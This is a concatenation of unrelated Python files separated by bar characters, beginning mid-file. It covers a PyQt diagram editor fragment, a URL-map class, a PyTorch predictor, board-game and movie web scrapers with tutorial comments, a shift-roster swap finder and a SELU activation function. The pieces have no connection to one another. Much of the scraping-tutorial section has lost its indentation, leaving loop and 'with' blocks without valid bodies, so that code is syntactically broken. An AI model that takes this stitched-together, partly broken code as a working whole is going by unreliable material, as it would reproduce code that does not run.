        QMessageBox.warning(self,"Balanceador -- Open Error","Failed to open "+str(self.filename))
    finally:
        if fh is not None:
            fh.close()
        self.updateLog("Loaded!")
def readTextFromStream(self, qstream):
    """Read one text annotation (string, position, font) and recreate it
    in the scene as a TextItem."""
    position = QPointF()
    font = QFont()
    label = qstream.readQString()
    qstream >> position >> font
    TextItem(label, position, self.scene, font)
def readItemFromStream(self, qstream):
    """Read one graphics record and recreate it, unless it carries the
    "Pass" sentinel (or an empty tag), which has no payload to read."""
    tipo = qstream.readQString()
    if tipo == "Pass" or tipo == "":
        return
    position = QPointF()
    pixmap = QPixmap()
    angle = qstream.readInt()
    qstream >> position >> pixmap
    self.drawItemFromStream(pixmap, position, tipo, angle)
def drawItemFromStream(self, pixmap, position, tipo, angle):
    """Recreate a graphics item from deserialized data and select it."""
    item = graphic_object()
    source = QPixmap(pixmap)
    # Divisors use a square footprint; every other symbol is 2:1.
    if tipo == "Divisor":
        item.setPixmap(source.scaled(200, 200))
    else:
        item.setPixmap(source.scaled(200, 100))
    item.setPos(position)
    item.setRotation(angle)
    self.scene.clearSelection()
    self.scene.addItem(item)
    item.setSelected(True)
def new_file(self):
    """Reset the editor: empty registries, cleared scene, fresh title."""
    global streams
    global spliters
    self.filename = ""
    self.setWindowTitle("Balanceador del Sistrangas-----")
    self.updateLog("New file created")
    streams = {}
    spliters = {}
    # Remove every item currently in the scene.
    for item in list(self.scene.items()):
        self.scene.removeItem(item)
        del item
    self.marco()
def save_as(self):
    """Ask for a new filename and save the diagram there."""
    chosen = QFileDialog.getSaveFileName(self, "Balanceador - Save as", ".", "Balanceador Files(*.pgd)")
    if chosen[0] == "":
        # Dialog cancelled.
        return
    self.filename = chosen[0]
    self.save_f()
def keyPressEvent(self, event):
    """Keyboard handler: the Delete key removes the current selection."""
    if event.key() != Qt.Key_Delete:
        return
    print("Exterminate!")
    self.delete_item()
'''---------Invocación de main frame-----'''
# Application bootstrap: create the Qt application, show the main window
# sized to the full desktop width and ~90% of its height.
app=QApplication(sys.argv)
app.setOrganizationName("Cenagas")
#app.setApplicationName("Balance de materia SISTRANGAS")
form=MainWindow()
rect=QApplication.desktop().availableGeometry()
# Fix: QWidget.resize() takes ints; passing floats raises TypeError (PyQt5).
form.resize(int(rect.width()),int(rect.height()*0.9))
form.show()
app.exec_()
|
"""
------------------------------------------------------------------------
URL Map
------------------------------------------------------------------------
Author: bb $kreetz
Email: bbskreets@protonmail.com
__updated__ = "2020-04-12"
------------------------------------------------------------------------
"""
from SETTINGS import *
from CONSTANTS import *
import json
from uuid import uuid4
class urlmap():
    """uuid -> URL mapping persisted as JSON at URL_MAP_PATH."""

    def __init__(self):
        # Load the whole map into memory; _save() writes it back on change.
        with open(URL_MAP_PATH, 'r') as fh:
            self.map = json.loads(fh.read())
        return

    def __iter__(self):
        # Iterate over the uuid keys.
        for i in self.map:
            yield i

    def __getitem__(self, item):
        return self.map[item]

    def add(self, url):
        """Register *url* under a fresh uuid, persist, and return the uuid."""
        uuid = self._get_uuid()
        self.map[uuid] = str(url)
        self._save()
        return uuid

    def _save(self):
        # Persist the map atomically enough for this use: one JSON dump.
        with open(URL_MAP_PATH, 'w') as fh:
            json.dump(self.map, fh, indent=2)
        return

    def _get_uuid(self):
        """Return a uuid4 string not already present among the map's values.

        Fix: the original compared a UUID *object* against the string values,
        so the collision check could never match; compare strings instead.
        """
        uuid = str(uuid4())
        while uuid in self.map.values():
            uuid = str(uuid4())
        return uuid

    def remove_site(self, uuid):
        """Delete *uuid* from the map and persist the change."""
        self.map.pop(uuid)
        self._save()
|
from typing import Tuple
import torch
import torch.nn as nn
import torchvision
from omegaconf import DictConfig
from PIL import Image
from src.model import net as Net
from src.utils import load_class
def build_model(model_conf: DictConfig):
    """Instantiate the network class named by ``model_conf.type``."""
    ctor_args = {"model_config": model_conf}
    return load_class(module=Net, name=model_conf.type, args=ctor_args)
class Predictor(torch.nn.Module):
    """Inference wrapper: builds the configured model and exposes
    single-sample prediction plus PIL-image preprocessing.
    """

    def __init__(self, config: DictConfig) -> None:
        """Build the model described by ``config.model``.

        Args:
            config (DictConfig): configuration with Omegaconf.DictConfig
                format for dataset/model/runner; only ``config.model`` is
                used here.
        """
        super().__init__()
        # Echo the configuration for debugging/traceability.
        # (The original used f-strings with no placeholders — plain literals.)
        print("=======CONFIG=======")
        print(config)
        print("====================")
        self.model: nn.Module = build_model(model_conf=config.model)

    def forward(self, x):
        # Delegate to the model's dedicated single-sample inference path.
        return self.model.single_inference(x)

    def preprocess(self, image: Image) -> torch.Tensor:
        """Convert a PIL image to a batched (1, C, H, W) float tensor."""
        return torchvision.transforms.ToTensor()(image).unsqueeze(0)
|
# coding: utf-8
# In[3]:
import urllib2, time, random, re
from bs4 import BeautifulSoup, SoupStrainer
import pandas as pd
import requests
# In[157]:
from HTMLParser import HTMLParser
class MLStripper(HTMLParser):
    """HTML parser that keeps only text content, discarding every tag."""
    def __init__(self):
        self.reset()
        self.fed = []
    def handle_data(self, d):
        # Invoked by HTMLParser for each run of raw text between tags.
        self.fed.append(d)
    def get_data(self):
        # Concatenate the collected fragments into one string.
        collected = self.fed
        return ''.join(collected)
def strip_tags(html):
    """Return *html* with all markup removed, keeping only the text."""
    stripper = MLStripper()
    stripper.feed(html)
    return stripper.get_data()
# In[39]:
#find all the links given website and append to all_url list. From that list find all the links that end with /boardgame/somedigits
# (Python 2 script: urllib2 / print statements.)
soup = BeautifulSoup(urllib2.urlopen(urllib2.Request("https://boardgamegeek.com/browse/boardgame")).read())
all_url = []
# Crawl the first five browse pages and collect every anchor href.
for i in range(1,6):
    soup = BeautifulSoup(urllib2.urlopen(urllib2.Request("https://boardgamegeek.com/browse/boardgame/page/" + str(i))).read())
    for a in soup.find_all('a', href = True):
        all_url.append(a['href'])
board_games = []
for url in all_url:
    # Keep only links of the form /boardgame/<id>-<slug>.
    if re.match('/boardgame/\d+\w+', url):
        board_games.append(url)
# In[115]:
board_games = list(set(board_games))
#get the board game ID numbers
board_games_and_nums =[]
nums_only =[]
for b in board_games:
    digits = re.search('\d+', b)
    last_digit_index = re.search('\d+', b).end()
    # Everything after the numeric id (and separator) is the hyphenated name.
    name_of_game = b[last_digit_index + 1:]
    name_of_game = name_of_game.replace('-', ' ')
    board_games_and_nums.append([name_of_game.lower(), digits.group(0)])
    nums_only.append(digits.group(0))
# In[124]:
games = nums_only[:]
dic ={}
bgn = []
# Query the XML API in batches of 25 game ids per request, collecting each
# game's lowercase name and description into `dic` and (name, id) into `bgn`.
while len(games)>0:
    print len(games)
    s = ','.join(games[:25])
    final_url = 'http://www.boardgamegeek.com/xmlapi/boardgame/' + s + '?comments=1'
    print final_url
    soup = BeautifulSoup(urllib2.urlopen(urllib2.Request(final_url)).read())
    for num in games[:25]:
        name_of_game = soup.find('boardgame', {'objectid': num}).find('name', {'primary' : 'true'}).text
        name_of_game = name_of_game.lower()
        des = soup.find('boardgame', {'objectid': num}).description.text
        dic[name_of_game] = {}
        dic[name_of_game]['description'] = des
        bgn.append([name_of_game, num])
    games = games[25:]
# In[125]:
#get the top 5 forums and put in list for later processing later. group everything in dictionary
base_forum_list_url = 'https://www.boardgamegeek.com/xmlapi2/forumlist?id='
base_forum_url = 'https://www.boardgamegeek.com/xmlapi2/forum?id='
for number in bgn:
    print 'num', number[1]
    final_forum_list_url = base_forum_list_url + number[1] + '&type=thing'
    forum_list = BeautifulSoup(urllib2.urlopen(urllib2.Request(final_forum_list_url)).read())
    # Locate the "Reviews" forum for this game, sorted by hotness.
    ID = forum_list.find('forum', {'title': 'Reviews'}).get('id')
    final_forum_url = base_forum_url + ID + '&sort=hot'
    forum = BeautifulSoup(urllib2.urlopen(urllib2.Request(final_forum_url)).read())
    all_threads = forum.find_all('thread')
    list_of_top_five_threads = []
    for thread in all_threads[:5]:
        list_of_top_five_threads.append(thread.get('id'))
    words_in_top_five_threads = []
    thread_base_url = 'https://www.boardgamegeek.com/xmlapi2/thread?id='
    for thread_ID in list_of_top_five_threads:
        final_thread_url = thread_base_url + thread_ID
        thread = BeautifulSoup(urllib2.urlopen(urllib2.Request(final_thread_url)).read())
        # Only the first <article> (the original post) of each thread is kept.
        words_in_top_five_threads.append(thread.find('article').getText())
    dic[number[0]]['user_reviews'] = words_in_top_five_threads
# In[133]:
#convert dictionary to dataframe
df = pd.DataFrame.from_dict(dic)
# In[178]:
#function to remove html tags from text
strip = lambda x: strip_tags(x)
# In[192]:
#join the list of reviews into one giant review
for columns in df:
    df.loc['user_reviews', columns] = ' '.join(df.loc['user_reviews', columns])
# In[200]:
#remove html tags from all rows and columns
for columns in df:
    df.loc['user_reviews', columns] = strip(df.loc['user_reviews', columns])
    df.loc['description', columns] = strip(df.loc['description', columns])
# In[203]:
#convert df to csv
# NOTE(review): DataFrame.to_csv returns None when given a path, so
# `dataframe` ends up None — the CSV file itself is the real output.
dataframe = df.to_csv('board_game_data_frame', sep = ',', encoding = 'utf-8')
|
# Script to combine all the neighborhoods
import numpy as np
import networkx as nx
# Total node count: 10^6 network nodes plus 10^4 inactive ones.
N = pow(10,6) + pow(10,4)
every_ngbd = [None]*N
# Merge the first 30 of the 40 neighborhood chunk files; each chunk entry's
# element [0] is the node index it belongs at in the combined array.
# NOTE(review): only chunks 0..29 of "..._of_40" are loaded — confirm the
# remaining 10 chunks are intentionally excluded.
for x in range(0,30):
    print(x)
    chunk_ngbd = np.load('/home/gotmare/network_scan_estimators/mar28_new/N_inactive_10^4/neighborhood_data/ngbd_part_'
                +str(x)+'_of_40.npy')
    for j in range(len(chunk_ngbd)):
        every_ngbd[chunk_ngbd[j][0]] = chunk_ngbd[j]
np.save('every_ngbd_G_10_power_4_2017-03-29-18:48.npy', every_ngbd)
import csv
class ChosenOne:
    """Loads one month's duty roster (CSV) and exposes the row belonging
    to 'Kowalski' plus the free (empty) day columns of that row."""

    def __init__(self, p):
        """Read the roster CSV at path *p*.

        Fix: the original leaked the file handle.  All rows are read up
        front inside a context manager; wrapping them in iter() preserves
        the one-shot consumption semantics of csv.DictReader.
        """
        with open(p, 'r') as fh:
            self.month = iter(list(csv.DictReader(fh)))
        self.sd = {}

    def get_my_row(self):
        """Advance through the rows until Kowalski's; store and return it."""
        for row in self.month:
            self.sd = dict(row)
            if self.sd['Nazwisko'] == 'Kowalski':
                break
        return self.sd

    def wolne(self):
        """Return the column names with an empty value (free days)."""
        return [i for i in self.sd if self.sd[i] == ""]
class Changes:
    """Finds colleagues (across three roster groups) who could swap a
    shift with the chosen person on ``self.day``."""

    def __init__(self, p1, p2, p3, cls):
        """Load the three group rosters and remember the chosen row.

        Fix: the original left three file handles open; rows are now read
        eagerly inside context managers (iter() keeps the original
        one-shot DictReader semantics).
        """
        self.months = []
        for p in (p1, p2, p3):
            with open(p) as fh:
                self.months.append(iter(list(csv.DictReader(fh))))
        self.my_row = cls
        self.day = 8  # int(input("insert the day when you wanna make some change: "))

    def find_cng(self):
        """Return 'Nazwisko Imię' of everyone eligible to swap on self.day."""
        chgs_list = []
        day = str(self.day)
        prev_day = str(self.day - 1)
        next_day = str(self.day + 1)
        if self.my_row[day] == 'O':
            # I work that day: candidates are free on the day and the day
            # before, and not working ('O') the day after.
            for month in self.months:
                for row in month:
                    if row[day] == '' and row[prev_day] == '' and row[next_day] != 'O':
                        chgs_list.append(row['Nazwisko'] + " " + row['Imię'])
        elif self.my_row[day] not in ('O', ''):
            # Fix: the original compared against the tuple ('O', '') — always
            # unequal — and against ('O' or ''), which is just 'O'.
            for month in self.months:
                for row in month:
                    if row[day] == '' and row[prev_day] in ('O', '') and row[next_day] == '':
                        chgs_list.append(row['Nazwisko'] + " " + row['Imię'])
        return chgs_list
# Roster files for the three employee groups (June).  Raw strings avoid
# accidental backslash escapes in Windows paths (the originals relied on
# "\p"/"\c" not being recognized escapes, which is deprecated).
pth1 = r"C:\pliki_py\czerwiec_1.csv"
pth2 = r"C:\pliki_py\czerwiec_2.csv"
pth3 = r"C:\pliki_py\czerwiec_3.csv"
me = ChosenOne(pth1)
my_chgs = Changes(pth1, pth2, pth3, me.get_my_row())
ex_list = my_chgs.find_cng()
print("your free days: ", *me.wolne())
print("you can make {} change with: {}".format(len(ex_list), ex_list))
|
# from .contenttype import *
from .locale import *
from .company import *
from .auth import *
from .partner import *
from .bank import *
from .module import *
from .sequence import *
from .config import *
from .decimal import *
from .http import *
from .copy import *
|
import numpy
import math
|
# Reading TSV file in pandas
# NOTE(review): these are tutorial/notebook notes, not a runnable script —
# e.g. `pd` is used here before any `import pandas as pd` appears.
df= pd.read_csv('bestofrt.tsv', sep='\t')
# Webscraping
# Step 1: getting webpage's data
## stored in html (hypertext markup language) format
# downloading html programmatically
import requests
url = 'url'
response = requests.get(url)
# save html to file
with open("... .html", mode='wb') as file:
    file.write(response.content)
# to download all 100 files, need to put this in a loop
from bs4 import BeautifulSoup
soup = BeautifulSoup(response.content, 'lxml')
# in this way, we do not save this information on our computer, but working live with response content in computer's memory
# 'lxml' - can use the beautifulsoup html parser, to help work with response content directly
# HTML files in Python
# BeautifulSoup
# import
from bs4 import BeautifulSoup
with open('et-html file') as file:
    soup = BeautifulSoup(file, 'lxml') # need to include a parser or we get an error
soup
# let's find the movie's title using the find() method
soup.find('title')
## this results in title of the webpage and not title of the movie
# to get the title only, we will need to do some string slicing
# we can use .contents to return a list of the tag's children
soup.find('title').contents[0][:-len(' - Rotten Tomatoes')]
# this finds everything before the ' -', or 18 characters before the end
# \xa0 unicode for non-breaking space
# Gathering quiz:
from bs4 import BeautifulSoup
import os
# looking at title
df_list = []
folder = 'rt_html'
for movie_html in os.listdir(folder):
    with open(os.path.join(folder, movie_html)) as file: # loops through every file in our rthtml folder
        soup = BeautifulSoup(file, 'lxml') # first we need to create the soup, by passing in the file handle
        # should specify lxml parser
        title = soup.find('title').contents[0][:-len(' - Rotten Tomatoes')] # first thing to grab from HTML was title
        # we find the contents in the title, we want the first element in title ([0]), and we want to slice off - Rotten Tomatoes
        print(title) # print first step
        break # (break the loop)
# looking at title and audience score
df_list = []
folder = 'rt_html'
for movie_html in os.listdir(folder):
    with open(os.path.join(folder, movie_html)) as file:
        soup = BeautifulSoup(file, 'lxml')
        title = soup.find('title').contents[0][:-len(' - Rotten Tomatoes')]
        audience_score = soup.find('div', class_='audience-score meter').find('span').contents[0][:-1]
        # we find this within a div class titled "audience-score meter"
        # 72% is within the single span tag within the outer most div tag
        # we can use soup.find again, but first need to find the div with class audience-score meter
        # class needs an underscore under it, because class is a reserved keyword in python
        print(audience_score) # let's loop through once, print, and then loop again
        break
# we found the audience score, now just need to look in contents, and it is the only item in the span tag so .contents[0]
# we don't want % sign so we will slice it. we want everything in string except last character, so [:-1]
# now grabbing number of audience ratings
# first look at html and find where it says user ratings
# outermost div class is "audience-info hidden-xs superPageFontColor"
# let's zoom in on this using BS
df_list = []
folder = 'rt_html'
for movie_html in os.listdir(folder):
    with open(os.path.join(folder, movie_html)) as file:
        soup = BeautifulSoup(file, 'lxml')
        title = soup.find('title').contents[0][:-len(' - Rotten Tomatoes')]
        audience_score = soup.find('div', class_='audience-score meter').find('span').contents[0][:-1]
        num_audience_ratings = soup.find('div', class_='audience-info hidden-xs superPageFontColor')
        num_audience_ratings = num_audience_ratings.find_all('div')[1].contents[2].strip().replace(',', '')
        print(num_audience_ratings)
        break
# by using the print/break strategy, we can more clearly see what is within this tag
# the user ratings are in the 2nd div tag within the outer div, so lets find all div tags within this outer div, and use the 2nd
# we want the third item in this div, so .contents[2]
# there is white space we want to strip out using python strip function .strip()
# we will need to convert this string to an integer later, and remove comma .replace(',', '')
# now we need to append these to a pandas df
# first we need to import pandas library
# Build the final dataframe: one dict per movie appended to df_list.
df_list = []
folder = 'rt_html'
for movie_html in os.listdir(folder):
    with open(os.path.join(folder, movie_html)) as file:
        soup = BeautifulSoup(file, 'lxml')
        title = soup.find('title').contents[0][:-len(' - Rotten Tomatoes')]
        audience_score = soup.find('div', class_='audience-score meter').find('span').contents[0][:-1]
        num_audience_ratings = soup.find('div', class_='audience-info hidden-xs superPageFontColor')
        num_audience_ratings = num_audience_ratings.find_all('div')[1].contents[2].strip().replace(',', '')
        # Fix: the original dict literal was missing the comma after `title`
        # and the closing parenthesis of int(audience_score) — a SyntaxError.
        df_list.append({'title': title,
                        'audience_score': int(audience_score),  # converting string to integer
                        'number_of_audience_ratings': int(num_audience_ratings)})  # converting string to integer
df = pd.DataFrame(df_list, columns = ['title', 'audience_score', 'number_of_audience_ratings'])
# let's process this cell, which may take some time to run
# great, no errors
# let's look at this dataframe
# Solution Test
# Run the cell below the see if your solution is correct. If an AssertionError is thrown, your solution is incorrect. If no error is thrown, your solution is correct.
df_solution = pd.read_pickle('df_solution.pkl')
# Sort both frames by title and reset the index so the comparison below is
# order-independent.
df.sort_values('title', inplace = True)
df.reset_index(inplace = True, drop = True)
df_solution.sort_values('title', inplace = True)
df_solution.reset_index(inplace = True, drop = True)
pd.testing.assert_frame_equal(df, df_solution)
# Now we can create the word cloud of Roger Ebert's reviews
# First, downloading files from the internet using Python's requests (HTTP for Humans)
# we will use requests.get to get these files
import requests # import requests library
import os # also import the os library too, see we can store the downloaded file in a folder called ebert reviews
folder_name = 'ebert_reviews'
if not os.path.exists(folder_name):
os.makedirs(folder_name) # this creates folder if it does not already exist
url = 'https://...' # rogert ebert review text file stored on Udacity servers
response = requests.get(url) # we use requests.get on a url and that returns a response
# response # what does response variable look like?
# output: <Response [200]>, this is the http status code for the request has succeeded
# text from text file is currently in our computer's working memory
# it's stored in the body of the response which we can access using .content
response.content
# output: in bytes format, with review text
# we are now going to save this file to our computer
# we want to open a file, by accessing everything after the last slash in the url before .txt
with open(os.path.join(folder_name,
url.split('/')[-1]), mode='wb') as file: # select last item in the list returned
file.write(response.content)
# we need to open this file, which will then write the contents of the response variable too
# we need to open this in wb mode, write binary (mode='wb')
# that's because response.content is in bites, and not text
# then we write to the file handle we have opened: file.write(response.content)
# ^^ That's how you download 1 file programmatically
# Let's check contents of our folder ebert reviews, to make sure the file is there
os.listdir(folder_name)
# output: ['.DS_Store', '11-e.t.-the-extra-terrestrial.txt']
# .DS_Store is a hidden file that stores the attributes of our folder
# Quiz: downloading multiple files from the internet
# In the Jupyter Notebook below, programmatically download all of the Roger Ebert review text files to a folder called ebert_reviews using
# the Requests library. Use a for loop in conjunction with the provided ebert_review_urls list.
import requests
import os
ebert_review_urls = ['many urls here']
folder_name = 'ebert_reviews'
if not os.path.exists(folder_name):
os.makedirs(folder_name)
for url in ebert_review_urls: # then we will get the http response via request.get, on whatever iteration we are currently on in that loop
response = requests.get(url)
with open(os.path.join(folder_name, url.split('/')[-1]), mode = 'wb') as file: # then the bit of code to open a file and write a response.content to that file is the same as above
file.write(response.content) # we will process the cell, took 5 secs
os.listdir(folder_name) # check contents of the folder, there should be 88
len(os.listdir(folder_name)) # check if there are 88
# 12 movies on the top 100 list did not have reviews on roger ebert's site
# Solution Test
import filecmp
dc = filecmp.dircmp('ebert_reviews', 'ebert_reviews_solution')
assert len(dc.common) == 88
# Gathering data from text files
# we have 88 roger ebert reviews to open and read
# we will need a loop to iterate through all of the files in this folder to open and read each
# we can use a library called os and a library called glob
import os
folder = 'ebert_reviews'
for ebert_review in os.listdir(folder):
with open(os.path.join(folder, ebert_review)) as file:
# we have been using os's listdir, which is good if you are sure you want to open every file in the folder
# but let's try using glob instead: allows us to use something called glob patterns to specify sets of file names
# these glob patterns use something called wildcard characters
# focusing on glob.glob, which returns a list of pathnames that match pathname, i.e. string parameter we passed.
# we want all file names ending in txt
import glob
# glob.glob returns a list which we can loop through directly.
for ebert_review in glob.glob('ebert_reviews/*.txt'): # every file in eber_reviews folder, then every file ending in .txt
# * = wildcard for the glob pattern, match any string of any length
print(ebert_review) # prints paths to all files
# we can pass this into the open function in python
import glob
for ebert_review in glob.glob('ebert_reviews/*.txt'):
with open(ebert_review, encoding='utf-8') as file:
print(file.read()) # we would get all text in 1 big chunk
break
# should include encoding. doing so means you get correctly decoded unicode, or an error right away, making this easy to debug
# encoding depends on source of the text, we can inspect source of webpage (right-click, view page source) and find encoding is utf-8 (meta charset)
# but we want everything in the first line (title), second line (link), then everything afterwards as separate pieces of data
import glob
for ebert_review in glob.glob('ebert_reviews/*.txt'):
with open(ebert_review, encoding='utf-8') as file:
print(file.readline()[:-1]) # read 1 line, slicing off blank space
break # this gives us just the 1st line of the 1st file, including whitespace (/n, new line character)
# now we want to grab url and full review text
import glob
import pandas as pd
df_list = []
for ebert_review in glob.glob('ebert_reviews/*.txt'):
with open(ebert_review, encoding='utf-8') as file:
title = file.readline()[:-1] # 1st line minus whitespace = title
review_url = file.readline()[:-1]
review_text = file.read() # readlines throws an error when checking the solution, so we use read
# we want to add this into a pandas dataframe, which we can achieve by first creating an empty list, then populate list 1 by 1 as we iterate through the for loop
df_list.append({'title': title,
'review_url': review_url,
'review_text': review_text}) # we will fill this list with dictionaries and this list of dictionaries will later be converted to a pandas df
df = pd.DataFrame(df_list, columns=['title', 'review_url', 'review_text'])
# Solution Test
# Run the cell below the see if your solution is correct. If an AssertionError is thrown, your solution is incorrect. If no error is thrown, your solution is correct.
df_solution = pd.read_pickle('df_solution.pkl')
df.sort_values('title', inplace = True)
df.reset_index(inplace = True, drop = True)
df_solution.sort_values('title', inplace = True)
df_solution.reset_index(inplace = True, drop = True)
pd.testing.assert_frame_equal(df, df_solution)
df_solution = pd.read_pickle('df_solution.pkl')
df.sort_values('title', inplace = True)
df.reset_index(inplace = True, drop = True)
df_solution.sort_values('title', inplace = True)
df_solution.reset_index(inplace = True, drop = True)
pd.testing.assert_frame_equal(df, df_solution)
# Source - APIs
# now getting each movie's poster to form our word cloud
# can scrape image url from the html, but a better way to access is using API
# API: application programming interface
# since each movie has its poster on Wikipedia movie page, can use Wikipedia API
# Rotten Tomatoes API provides audience scores, we could have hit the API instead of scraping off webpage
# does not provide posters, images, but we would need to apply for usage
# always choose API over scraping when available, scraping is brittle, can break when html changes
# example using rt api
# Example: querying the Rotten Tomatoes API via the rtsimple wrapper.
import rtsimple as rt
rt.API_KEY = 'YOUR API KEY HERE' # we only have access to this once RT approves our proposal
# Fix: the original read "movie - rt.Movies('10489')" — a subtraction of an
# unbound name (NameError); an assignment was clearly intended.
movie = rt.Movies('10489') # movie id
movie.ratings['audience_score'] # then we access the ratings
# because we do not have access to the RT API, we will use MediaWiki, which hosts Wikipedia data
# Quiz
# In the Jupyter Notebook below, get the page object for the E.T. The Extra-Terrestrial Wikipedia page. Here is the E.T. Wikipedia page for easy reference.
import wptools
# Your code here: get the E.T. page object
# This cell may take a few seconds to run
page = wptools.page('E.T._the_Extra-Terrestrial').get()
# Accessing the image attribute will return the images for this page
page.data['image']
# JSON file structure
# Javascript Object Notation
# XML extensible mark up language
# referencing JSON files in python is just like acessing dictionaries
# JSON objects interpreted as dictionaries, arrays as lists
infobox_json
infobox_json['Box Office']
# result: total box office
infobox_json['Produced By']
# result: 2 director names
infobox_json['Release'][1]['Location']
# there are 2 release dates, this accesses the 2nd release, and its location
import wptools
page = wptools.page('E.T._the_Extra-Terrestrial').get()
# Quiz 1
# Access the first image in the images attribute, which is a JSON array.
page.data['image'][0]
# Quiz 2
# Access the director key of the infobox attribute, which is a JSON object.
page.data['infobox']['director']
# Gathering mashup solution
import pandas as pd
import wptools
import os
import requests
from PIL import Image
from io import BytesIO
title_list = [
'The_Wizard_of_Oz_(1939_film)',
'Citizen_Kane',
'The_Third_Man',
'Get_Out_(film)',
'Mad_Max:_Fury_Road',
'The_Cabinet_of_Dr._Caligari',
'All_About_Eve',
'Inside_Out_(2015_film)',
'The_Godfather',
'Metropolis_(1927_film)',
'E.T._the_Extra-Terrestrial',
'Modern_Times_(film)',
'It_Happened_One_Night',
"Singin'_in_the_Rain",
'Boyhood_(film)',
'Casablanca_(film)',
'Moonlight_(2016_film)',
'Psycho_(1960_film)',
'Laura_(1944_film)',
'Nosferatu',
'Snow_White_and_the_Seven_Dwarfs_(1937_film)',
"A_Hard_Day%27s_Night_(film)",
'La_Grande_Illusion',
'North_by_Northwest',
'The_Battle_of_Algiers',
'Dunkirk_(2017_film)',
'The_Maltese_Falcon_(1941_film)',
'Repulsion_(film)',
'12_Years_a_Slave_(film)',
'Gravity_(2013_film)',
'Sunset_Boulevard_(film)',
'King_Kong_(1933_film)',
'Spotlight_(film)',
'The_Adventures_of_Robin_Hood',
'Rashomon',
'Rear_Window',
'Selma_(film)',
'Taxi_Driver',
'Toy_Story_3',
'Argo_(2012_film)',
'Toy_Story_2',
'The_Big_Sick',
'Bride_of_Frankenstein',
'Zootopia',
'M_(1931_film)',
'Wonder_Woman_(2017_film)',
'The_Philadelphia_Story_(film)',
'Alien_(film)',
'Bicycle_Thieves',
'Seven_Samurai',
'The_Treasure_of_the_Sierra_Madre_(film)',
'Up_(2009_film)',
'12_Angry_Men_(1957_film)',
'The_400_Blows',
'Logan_(film)',
'All_Quiet_on_the_Western_Front_(1930_film)',
'Army_of_Shadows',
'Arrival_(film)',
'Baby_Driver',
'A_Streetcar_Named_Desire_(1951_film)',
'The_Night_of_the_Hunter_(film)',
'Star_Wars:_The_Force_Awakens',
'Manchester_by_the_Sea_(film)',
'Dr._Strangelove',
'Frankenstein_(1931_film)',
'Vertigo_(film)',
'The_Dark_Knight_(film)',
'Touch_of_Evil',
'The_Babadook',
'The_Conformist_(film)',
'Rebecca_(1940_film)',
"Rosemary%27s_Baby_(film)",
'Finding_Nemo',
'Brooklyn_(film)',
'The_Wrestler_(2008_film)',
'The_39_Steps_(1935_film)',
'L.A._Confidential_(film)',
'Gone_with_the_Wind_(film)',
'The_Good,_the_Bad_and_the_Ugly',
'Skyfall',
'Rome,_Open_City',
'Tokyo_Story',
'Hell_or_High_Water_(film)',
'Pinocchio_(1940_film)',
'The_Jungle_Book_(2016_film)',
'La_La_Land_(film)',
'Star_Trek_(film)',
'High_Noon',
'Apocalypse_Now',
'On_the_Waterfront',
'The_Wages_of_Fear',
'The_Last_Picture_Show',
'Harry_Potter_and_the_Deathly_Hallows_–_Part_2',
'The_Grapes_of_Wrath_(film)',
'Roman_Holiday',
'Man_on_Wire',
'Jaws_(film)',
'Toy_Story',
'The_Godfather_Part_II',
'Battleship_Potemkin'
]
folder_name = 'bestofrt_posters'
if not os.path.exists(folder_name):
os.makedirs(folder_name)
# List of dictionaries to build and convert to a DataFrame later
df_list = []
image_errors = {} #
# Download the first (poster) image for every movie title; failures are
# collected in image_errors instead of aborting the whole loop.
for title in title_list:
    try:  # try and except go together: errors for one title fall through to except
        # This cell is slow so print ranking to gauge time remaining
        ranking = title_list.index(title) + 1  # 1-based rank; list is ordered by rank
        print(ranking)
        page = wptools.page(title, silent=True)  # silent=True: do not echo page data while running
        images = page.get().data['image']
        # First image is usually the poster
        first_image_url = images[0]['url']
        r = requests.get(first_image_url)
        # BytesIO wraps the raw response bytes in a file-like object so PIL can open it
        i = Image.open(BytesIO(r.content))
        image_file_format = first_image_url.split('.')[-1]  # extension after the last dot
        # Fix: original had mismatched parentheses — i.save(folder_name) + "/" + ... )
        # which called save() with only the folder and then TypeError'd on the +.
        i.save(folder_name + "/" + str(ranking) + "_" + title + '.' + image_file_format)
        # Append to list of dictionaries
        # Fix: original dict literal was missing the comma after int(ranking).
        df_list.append({'ranking': int(ranking),
                        'title': title,
                        'poster_url': first_image_url})
    # Not best practice to catch all exceptions but fine for this short script
    except Exception as e:
        print(str(ranking) + '_' + title + ": " + str(e))
        image_errors[str(ranking) + "_" + title] = images
# Once you have completed the above code requirements, read and run the three cells below and interpret their output.
for key in image_errors.keys():
print(key)
# Inspect unidentifiable images and download them individually
for rank_title, images in image_errors.items():
if rank_title == '22_A_Hard_Day%27s_Night_(film)':
url = 'https://upload.wikimedia.org/wikipedia/en/4/47/A_Hard_Days_night_movieposter.jpg'
title = rank_title[3:]
df_list.append({'ranking': int(title_list.index(title) + 1),
'title' : title,
'poster_url': url})
# Relational Databases and pandas
# Imagine this notebook contains all of the gathering code from this entire lesson, plus the assessing and cleaning code done behind the scenes, and that the final product is a merged master DataFrame called df.
import pandas as pd
df = pd.read_csv('bestofrt_master.csv')
df.head(3)
# Connect to a database
from sqlalchemy import create_engine
# Create SQLAlchemy Engine and empty bestofrt database
# bestofrt.db will not show up in the Jupyter Notebook dashboard yet
engine = create_engine('sqlite:///bestofrt.db')
# 2. Store pandas DataFrame in database
# Store the data in the cleaned master dataset (bestofrt_master) in that database.
# Store cleaned master DataFrame ('df') in a table called master in bestofrt.db
# bestofrt.db will be visible now in the Jupyter Notebook dashboard
# 3. Read database data into a pandas DataFrame
# Read the brand new data in that database back into a pandas DataFrame.
df_gather = pd.read_sql('SELECT * FROM master', engine)
df_gather.head(3) |
from .data_source import DataSource
from .layout import AnalysisLayout
from .visual_analysis import VisualAnalysis
# Import Widgets so that they get registered
import pandas_visual_analysis.widgets
import plotly.io as pio
pio.templates.default = "plotly_white"
|
import numpy as np
import matplotlib.pyplot as plt
# SeLU(scaled exponential linear unit)
def selu(x):
    """Scaled Exponential Linear Unit (SELU) activation for a scalar.

    selu(x) = scale * x                      if x > 0
    selu(x) = scale * alpha * (exp(x) - 1)   otherwise

    Parameters
    ----------
    x : float
        Scalar input (apply element-wise for arrays, as the plot code does).

    Returns
    -------
    float
        The activated value.

    Raises
    ------
    ValueError
        If the scale constant is not > 1 (cannot happen with the
        hard-coded constants; kept from the original as a sanity check).
    """
    alpha = 1.67326324
    scale = 1.05070098
    # SELU's self-normalizing property requires scale > 1.
    # Fix: raise with an explanatory message instead of a bare ValueError.
    if not scale > 1:
        raise ValueError("SELU scale constant must be greater than 1")
    if x > 0:
        return scale * x
    return scale * alpha * (np.exp(x) - 1)
